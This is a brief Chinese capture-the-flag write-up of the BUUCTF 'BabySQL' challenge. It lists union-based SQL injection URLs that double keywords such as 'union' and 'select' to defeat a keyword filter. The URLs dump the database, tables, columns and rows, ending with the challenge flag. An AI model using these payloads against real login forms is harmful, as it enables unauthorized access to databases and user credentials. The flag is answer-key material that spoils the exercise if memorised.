[极客大挑战 2019]BabySQL
查数据库,查到库名 geek
http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,2,database()%23
查表 表名 b4bsql,geekuser
http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23
查字段 三个字段 id,username,password
http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'%23
估计和前面一样,看一下password字段
http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,database(),group_concat(id,username,passwoorrd) frfromom b4bsql%23
内容:
1 cl4yi_want_to_play_2077,
2 sqlsql_injection_is_so_fun,
3 porndo_you_know_pornhub,
4 gitgithub_is_different_from_pornhub,
5 Stopyou_found_flag_so_stop,
6 badguyi_told_you_to_stop,
7 hackerhack_by_cl4y,
8 flagflag{76b00924-5eae-4941-ad58-bbb3a05f4618}
再来搞一波
1 cl4yi想玩2077
2 sql注入太有意思了
3 不我不知道
4 g站和p站不一样
5 停止,你找到了flag所以停下
6 坏人 我告诉你停止了
7 黑客 被cl4y攻破
8 flag{76b00924-5eae-4941-ad58-bbb3a05f4618}
sqlmap跑不出来,难受啊